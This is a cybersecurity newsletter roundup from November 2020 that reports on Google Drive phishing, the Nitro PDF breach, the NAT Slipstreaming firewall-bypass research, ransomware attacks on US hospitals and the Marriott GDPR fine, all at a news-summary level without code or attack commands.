CYBER PULSE: EDITION 136 | 5 NOVEMBER 2020


Cyber Security Training Courses features the latest roundup up of cyber news stories on behalf of QA. Read the latest edition of Cyber Pulse:

Scammers use Google Drive notifications to send malicious links,


Cybercriminals are sending malicious links to hundreds of thousands of users via Google Drive notifications. Scammers are leveraging a legitimate Google Drive collaboration feature to trick users into clicking on malicious links. According to reports, the recent attack stems from Google Drive’s legitimate collaboration feature, which allows users to create push notifications or emails that invite people to share a Google doc. Attackers are abusing this feature to send mobile users Google Drive notifications that invite them to collaborate on documents, which then contain malicious links.

Because they are sent via Google Drive, the notifications come from Google’s no-reply email address, making them appear more legitimate. Other iterations of the attack are sent via email (instead of by notification) and include the malicious link right in the email. The attack is targeting hundreds of thousands of Google users, with the notifications being sent in Russian or broken English. The Google Drive notifications come with various lures. Many claim to be “personal notifications” from Google Drive, with one lure entitled “Personal Notification No 8482” telling the victim they haven’t signed into their account in a while. These threaten that the account will be deleted in 24 hours unless they sign in via a (malicious) link.

With the prevalence of working from home due to the coronavirus pandemic, attackers are increasingly leveraging collaboration and remote-work tools, including Google offerings. In May, researchers warned of a series of phishing campaigns using Google Firebase storage URLs. These used the reputation of Google’s cloud infrastructure to dupe victims and skate by secure email gateways.

Australian Nitro PDF services firm breached

The Australian company behind the popular PDF software Nitro PDF has suffered a data breach that may have impacted several other well-known organisations. Nitro PDF is used by thousands of business customers, including the likes of Google, Apple and Microsoft, and 1.8m licensed users. The company also offers a cloud service that can be used by customers to share documents with co-workers as well as with employees at other organisations.

In an advisory published on the investor relations section of its site, Nitro Software informed its customers that it had suffered a “low-impact security incident” though no sensitive financial data was impacted. However, security researchers have revealed that the company's user and document databases, as well as 1TB of documents allegedly stolen from the company, are being sold online in a private auction. For instance, the database reportedly contains 17,137 documents from Amazon, 6,405 from Apple, 32,153 from Google and 2,390 from Microsoft.

NAT Slipstreaming exploit can bypass local protections

New research has demonstrated a technique that allows an attacker to bypass firewall protection and remotely access any TCP/UDP service on a victim machine. Called NAT Slipstreaming, the method involves sending the target a link to a malicious site (or a legitimate site loaded with malicious ads) that, when visited, ultimately triggers the gateway to open any TCP/UDP port on the victim, thereby circumventing browser-based port restrictions.

The findings were revealed by privacy and security researcher Samy Kamkar. In an analysis, Kamkar stated:

"NAT Slipstreaming exploits the user's browser in conjunction with the Application Level Gateway (ALG) connection tracking mechanism built into NATs, routers, and firewalls by chaining internal IP extraction via timing attack or WebRTC, automated remote MTU and IP fragmentation discovery, TCP packet size massaging, TURN authentication misuse, precise packet boundary control, and protocol confusion through browser abuse."

NAT Slipstreaming works by taking advantage of TCP and IP packet segmentation to remotely adjust the packet boundaries and using it to create a TCP/UDP packet starting with a SIP method such as REGISTER or INVITE. The whole proof-of-concept code for NAT Slipstreaming can be found here.

Wave of ransomware attacks on US hospitals
A ransomware group responsible for a new wave of attacks against US hospitals is laying the groundwork to cripple at least 10 more, according to cyber security researchers. The analysis comes a day after the FBI and two other federal agencies issued a warning about an imminent and credible threat to hospitals and healthcare providers from cyberattacks, including ransomware capable of locking entire computer networks. The hacking group responsible has already hit at least nine hospitals in three weeks, crippling critical computer systems and demanding multimillion-dollar ransoms.

The US Government issued a joint cyber security advisory to guide hospitals and healthcare providers who may be victims of a malware attack. In it, the agencies highlighted the damage that the malicious tools used by attackers – Trickbot, a so-called botnet of infected computers, and Ryuk, a type of ransomware – can cause and how swiftly they may steal medical data. Several hospital companies have reported being struck by cyberattacks in recent days, including the University of Vermont Health Network, which includes six hospitals.

Marriott fined by regulator for 2014 data breach

The Information Commissioner's Office (ICO) has fined Marriott £18.4 million over a 2014 data breach, heavily reducing the penalty originally planned due to Covid-19 disruption. The Marriot hotel group was subject to a 2014 data breach impacting the Starwood resort chain, acquired by Marriott in 2015.

At the time, threat actors were able to infiltrate Starwood systems and execute malware via a web shell, including remote access tools and credential harvesting software. The attackers were then able to enter databases used to store guest reservation data including names, email addresses, phone numbers, passport numbers, travel details, and loyalty program information. The compromise continued until 2018, and over the course of four years, information belonging to roughly 339 million guests was stolen. In total, seven million records relating to UK guests were exposed.

The ICO reported the company failed to meet the security standards required by GDPR due to failures to "put appropriate technical or organizational measures in place" when processing data, and as such, the company contravened data protection requirements now enforced through 2018 GDPR regulations. 

Information Commissioner Elizabeth Denham, said:

”Personal data is precious and businesses have to look after it. Millions of people’s data was affected by Marriott’s failure; thousands contacted a helpline and others may have had to take action to protect their personal data because the company they trusted it with had not. When a business fails to look after customers’ data, the impact is not just a possible fine, what matters most is the public whose data they had a duty to protect.”

Last month, British Airways was fined £20 million by the ICO after cyberattackers stole information belonging to over 400,000 customers in 2018. 

Edited and compiled by QA's Director of Cyber, Richard Beck.

Subscribe to our weekly Cyber Pulse newsletter below.

QA